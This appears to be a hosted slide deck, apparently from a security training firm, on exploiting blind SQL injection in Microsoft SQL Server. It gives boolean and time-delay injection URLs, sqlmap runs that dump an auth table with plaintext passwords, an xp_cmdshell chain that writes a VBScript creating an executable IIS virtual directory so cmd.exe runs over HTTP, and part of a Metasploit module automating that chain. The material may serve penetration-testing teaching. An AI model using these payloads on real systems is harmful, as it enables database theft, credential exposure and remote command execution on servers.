BS
Uploaded byBlueinfy Solutions
PPT, PDF3,216 views

Blind SQL Injection

This document discusses techniques for exploiting blind SQL injection vulnerabilities when error messages and responses do not provide useful information. It describes using time delays, information gathering techniques like querying database and table names, and dumping table data to confirm exploitation without direct error messages. It also covers using HTTP to execute commands on the server by writing scripts and executing them remotely or retrieving files like cmd.exe. Exploitation may involve Metasploit or other tools and chaining multiple payloads to write scripts on the server and execute commands without direct output.

Embed presentation

Download to read offline
Blind SQL Injection
Blind SQL Injection • We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. • Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. • Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. • We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. • If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
Checks… • AND 1=1 • DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' • Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' • (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
Running tools • SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
Enumeration… D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:53:10 [18:53:12] [WARNING] the remote DMBS is not MySQL [18:53:12] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- available databases [9]: [*] CmdExec_example [*] Dashboard [*] catalog [*] demotrading [*] master [*] model [*] msdb [*] order [*] tempdb [*] shutting down at: 18:55:07
Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:59:21 [18:59:22] [WARNING] the remote DMBS is not MySQL [18:59:22] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog [3 tables] +--------------+ | auth | | dtproperties | | items | +--------------+
Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca talog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 19:01:27 [19:01:28] [WARNING] the remote DMBS is not MySQL [19:01:28] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog Table: auth [3 entries] +--------+------+---------+ | access | user | pass | +--------+------+---------+ | 101010 | dbo | john123 | | 110011 | | great | | 001011 | | loveit | +--------+------+---------+
Exploiting Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
Get the cmd.exe • Run command over HTTP/HTTPS • http://target/secret/system32/cmd.exe?+/c+set
Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..
Metasploit…
Conclusion

More Related Content

PPT
Web Attacks - Top threats - 2010
byShreeraj Shah
 
PPT
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
byShreeraj Shah
 
PPT
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
byShreeraj Shah
 
PDF
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
byShreeraj Shah
 
PDF
CSRF, ClickJacking & Open Redirect
byBlueinfy Solutions
 
PDF
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
byShreeraj Shah
 
PDF
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
byShreeraj Shah
 
PDF
Blackhat11 shreeraj reverse_engineering_browser
byShreeraj Shah
 
Web Attacks - Top threats - 2010
byShreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
byShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
byShreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
byShreeraj Shah
 
CSRF, ClickJacking & Open Redirect
byBlueinfy Solutions
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
byShreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
byShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
byShreeraj Shah
 

What's hot

PDF
Html5 localstorage attack vectors
byShreeraj Shah
 
PDF
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
byShreeraj Shah
 
PDF
Top 10 HTML5 Threats - Whitepaper
byShreeraj Shah
 
PPT
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
byShreeraj Shah
 
KEY
Advanced CSRF and Stateless Anti-CSRF
byjohnwilander
 
PDF
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
byShreeraj Shah
 
PPTX
Top security threats to Flash/Flex applications and how to avoid them
byElad Elrom
 
PPT
Web Hacking
byInformation Technology
 
PPT
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
byJeremiah Grossman
 
PDF
Rest Security with JAX-RS
byFrank Kim
 
PPT
Source Code Analysis with SAST
byBlueinfy Solutions
 
PPTX
Web Application Security in front end
byErlend Oftedal
 
PPTX
SQL Injection and Clickjacking Attack in Web security
byMoutasm Tamimi
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
byJay Nagar
 
PDF
Advanced xss
byGajendra Saini
 
PPTX
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
PPT
UserCentric Identity based Service Invocation
byguestd5dde6
 
PPT
HTML5 hacking
byBlueinfy Solutions
 
PDF
Top Ten Web Hacking Techniques (2008)
byJeremiah Grossman
 
PDF
Common Web Application Attacks
byAhmed Sherif
 
Html5 localstorage attack vectors
byShreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
byShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
byShreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
byShreeraj Shah
 
Advanced CSRF and Stateless Anti-CSRF
byjohnwilander
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
byShreeraj Shah
 
Top security threats to Flash/Flex applications and how to avoid them
byElad Elrom
 
Web Hacking
byInformation Technology
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
byJeremiah Grossman
 
Rest Security with JAX-RS
byFrank Kim
 
Source Code Analysis with SAST
byBlueinfy Solutions
 
Web Application Security in front end
byErlend Oftedal
 
SQL Injection and Clickjacking Attack in Web security
byMoutasm Tamimi
 
Website hacking and prevention (All Tools,Topics & Technique )
byJay Nagar
 
Advanced xss
byGajendra Saini
 
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
UserCentric Identity based Service Invocation
byguestd5dde6
 
HTML5 hacking
byBlueinfy Solutions
 
Top Ten Web Hacking Techniques (2008)
byJeremiah Grossman
 
Common Web Application Attacks
byAhmed Sherif
 

Similar to Blind SQL Injection

PPT
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
byChema Alonso
 
PPT
ShmooCon 2009 - (Re)Playing(Blind)Sql
byChema Alonso
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
PPT
How "·$% developers defeat the web vulnerability scanners
byChema Alonso
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PPTX
Sqlmap
bySiddharthWagh7
 
PDF
SQL Injection
byAbhinav Nair
 
PDF
Sql injection with sqlmap
byHerman Duarte
 
PPT
Blind SQL Injection - Optimization Techniques
byguest54de52
 
PPT
Blind SQL Injection - Optimization Techniques
byamiable_indian
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
PDF
Blindsql
bybig boss
 
PDF
Blindsql
byRitu Raj
 
PPT
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
PPTX
Advanced SQL Injection
byJoe McCray
 
PPTX
Playing With (B)Sqli
byChema Alonso
 
PPT
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
PPTX
sqlmap- using -kali -linux by-22011556-105.pptx
byNasirAli233814
 
PDF
sqlmap internals
byMiroslav Stampar
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
byChema Alonso
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
byChema Alonso
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 
How "·$% developers defeat the web vulnerability scanners
byChema Alonso
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
Sqlmap
bySiddharthWagh7
 
SQL Injection
byAbhinav Nair
 
Sql injection with sqlmap
byHerman Duarte
 
Blind SQL Injection - Optimization Techniques
byguest54de52
 
Blind SQL Injection - Optimization Techniques
byamiable_indian
 
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
Blindsql
bybig boss
 
Blindsql
byRitu Raj
 
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
Advanced SQL Injection
byJoe McCray
 
Playing With (B)Sqli
byChema Alonso
 
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
sqlmap- using -kali -linux by-22011556-105.pptx
byNasirAli233814
 
sqlmap internals
byMiroslav Stampar
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 

More from Blueinfy Solutions

PDF
Mobile Application Scan and Testing
byBlueinfy Solutions
 
PDF
Mobile security chess board - attacks & defense
byBlueinfy Solutions
 
PPT
Mobile code mining for discovery and exploits nullcongoa2013
byBlueinfy Solutions
 
PPT
iOS Application Security Testing
byBlueinfy Solutions
 
PPT
Html5 on mobile
byBlueinfy Solutions
 
PPT
Android secure coding
byBlueinfy Solutions
 
PPT
Android attacks
byBlueinfy Solutions
 
PPT
Automation In Android & iOS Application Review
byBlueinfy Solutions
 
PPT
Web Services Hacking and Security
byBlueinfy Solutions
 
PPT
XSS - Attacks & Defense
byBlueinfy Solutions
 
PPT
Defending against Injections
byBlueinfy Solutions
 
PPT
XPATH, LDAP and Path Traversal Injection
byBlueinfy Solutions
 
PPT
Application fuzzing
byBlueinfy Solutions
 
PPT
SQL injection basics
byBlueinfy Solutions
 
PPT
Applciation footprinting, discovery and enumeration
byBlueinfy Solutions
 
PPT
Assessment methodology and approach
byBlueinfy Solutions
 
PPT
HTTP protocol and Streams Security
byBlueinfy Solutions
 
PPT
Advanced applications-architecture-threats
byBlueinfy Solutions
 
Mobile Application Scan and Testing
byBlueinfy Solutions
 
Mobile security chess board - attacks & defense
byBlueinfy Solutions
 
Mobile code mining for discovery and exploits nullcongoa2013
byBlueinfy Solutions
 
iOS Application Security Testing
byBlueinfy Solutions
 
Html5 on mobile
byBlueinfy Solutions
 
Android secure coding
byBlueinfy Solutions
 
Android attacks
byBlueinfy Solutions
 
Automation In Android & iOS Application Review
byBlueinfy Solutions
 
Web Services Hacking and Security
byBlueinfy Solutions
 
XSS - Attacks & Defense
byBlueinfy Solutions
 
Defending against Injections
byBlueinfy Solutions
 
XPATH, LDAP and Path Traversal Injection
byBlueinfy Solutions
 
Application fuzzing
byBlueinfy Solutions
 
SQL injection basics
byBlueinfy Solutions
 
Applciation footprinting, discovery and enumeration
byBlueinfy Solutions
 
Assessment methodology and approach
byBlueinfy Solutions
 
HTTP protocol and Streams Security
byBlueinfy Solutions
 
Advanced applications-architecture-threats
byBlueinfy Solutions
 

Recently uploaded

PDF
Transcript: Escape from the Forbidden Zone: Smuggling green and inclusive tec...
byBookNet Canada
 
PPTX
Microsoft Azure News - February 2026 - BAUG
byDaniel Toomey
 
PDF
UiPath Modern Automation Playbook -Session 2
bysuhanisingh58689
 
PPTX
CTO Strategy OS 2026: The Tech, AI & Cloud Playbook Boards Want
byridwansassman
 
PDF
From Artificial Intelligence to African Intelligence: Transforming Research &...
byMoses Kemibaro
 
PDF
Empower your IT team with cloud-based PC management using Dell Management Por...
byPrincipled Technologies
 
PDF
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
PPTX
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
PDF
final.pdf
byomarbishtawi04
 
PDF
HOW TO OVERCOME THE THREATS OF ARTIFICIAL INTELLIGENCE AGAINST HUMANITY.pdf
byFaga1939
 
PDF
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PDF
Agent to agent service discovery using HashiCorp Consul and Vault
byBram Vogelaar
 
PDF
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
PDF
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
PDF
From Hallucinations to High-Confidence AI with Data Enrichment.pdf
byPrecisely
 
PDF
UiPath Automation Developer Associate Training Series 2026 - Session 3
byDianaGray10
 
PPTX
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
PDF
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
PDF
How AI Can Help Platform Engineers Build Better Platforms
byAll Things Open
 
Transcript: Escape from the Forbidden Zone: Smuggling green and inclusive tec...
byBookNet Canada
 
Microsoft Azure News - February 2026 - BAUG
byDaniel Toomey
 
UiPath Modern Automation Playbook -Session 2
bysuhanisingh58689
 
CTO Strategy OS 2026: The Tech, AI & Cloud Playbook Boards Want
byridwansassman
 
From Artificial Intelligence to African Intelligence: Transforming Research &...
byMoses Kemibaro
 
Empower your IT team with cloud-based PC management using Dell Management Por...
byPrincipled Technologies
 
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
final.pdf
byomarbishtawi04
 
HOW TO OVERCOME THE THREATS OF ARTIFICIAL INTELLIGENCE AGAINST HUMANITY.pdf
byFaga1939
 
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
Agent to agent service discovery using HashiCorp Consul and Vault
byBram Vogelaar
 
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
From Hallucinations to High-Confidence AI with Data Enrichment.pdf
byPrecisely
 
UiPath Automation Developer Associate Training Series 2026 - Session 3
byDianaGray10
 
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
How AI Can Help Platform Engineers Build Better Platforms
byAll Things Open
 

Blind SQL Injection

  • 1.
  • 2.
    Blind SQL Injection •We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. • Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. • Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. • We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. • If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
  • 3.
    Checks… • AND 1=1 •DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' • Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' • (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
  • 4.
    Running tools • SQLMap or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
  • 5.
    Enumeration… D:toolssqlmap>sqlmap.py -b -uhttp://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:53:10 [18:53:12] [WARNING] the remote DMBS is not MySQL [18:53:12] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- available databases [9]: [*] CmdExec_example [*] Dashboard [*] catalog [*] demotrading [*] master [*] model [*] msdb [*] order [*] tempdb [*] shutting down at: 18:55:07
  • 6.
    Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1--tables -D catalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:59:21 [18:59:22] [WARNING] the remote DMBS is not MySQL [18:59:22] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog [3 tables] +--------------+ | auth | | dtproperties | | items | +--------------+
  • 7.
    Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1--dump -D ca talog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 19:01:27 [19:01:28] [WARNING] the remote DMBS is not MySQL [19:01:28] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog Table: auth [3 entries] +--------+------+---------+ | access | user | pass | +--------+------+---------+ | 101010 | dbo | john123 | | 110011 | | great | | 001011 | | loveit | +--------+------+---------+
  • 8.
    Exploiting Set WshShell =WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
  • 9.
    Get the cmd.exe •Run command over HTTP/HTTPS • http://target/secret/system32/cmd.exe?+/c+set
  • 10.
    Metasploit … sub Exploit{ my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..
  • 11.
  • 12.